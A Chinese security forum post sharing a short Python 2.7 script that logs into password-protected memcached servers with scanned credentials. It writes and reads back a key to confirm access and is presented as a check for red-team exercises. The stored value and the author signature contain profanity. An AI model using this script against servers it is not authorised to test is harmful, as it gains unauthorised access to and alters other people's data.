学python得永生python大法好之利用python编写memcache数据库操作(有账号密码的那种)

2020-06-14 16:42:36 12 3453
以前大家对memcache漏洞验证只局限于未授权访问,那么遇到shack2超级口令扫描出来的带账号和密码的该怎么登陆,估计知道的人应该不多,试试过一款国内的11211管理工具,也只能填写密码登陆,没有填写账号的的地方,今天给大家放一个python脚本,用来hw的时候验证漏洞,py27写的,支持账号密码登陆的
#!/usr/bin/env python
import bmemcached
client = bmemcached.Client(('8.8.8.8:11211'),'root','123456qwerty')
#client = bmemcached.Client(('8.8.8.8:11211')) 如果没账号密码就用这条代码
print client.set('key', 'caonima')
print client.get('key')
如果漏洞存在如下图:

如果漏洞不存在如下图:



代码写的烂不代表本人没有一颗分享的热忱之心,希望大家多多分享一些东西,众人拾柴火焰高

注意pip install python-binary-memcached

关于作者

googler62篇文章1324篇回复

My name is 一根屌!
以后对于发有价值的主题帖,如0day代码审计,逆向破解,原创程序开发,渗透实战型、工控、物联网、汽车安全、硬件破解一律打赏

评论12次

要评论?请先  登录  或  注册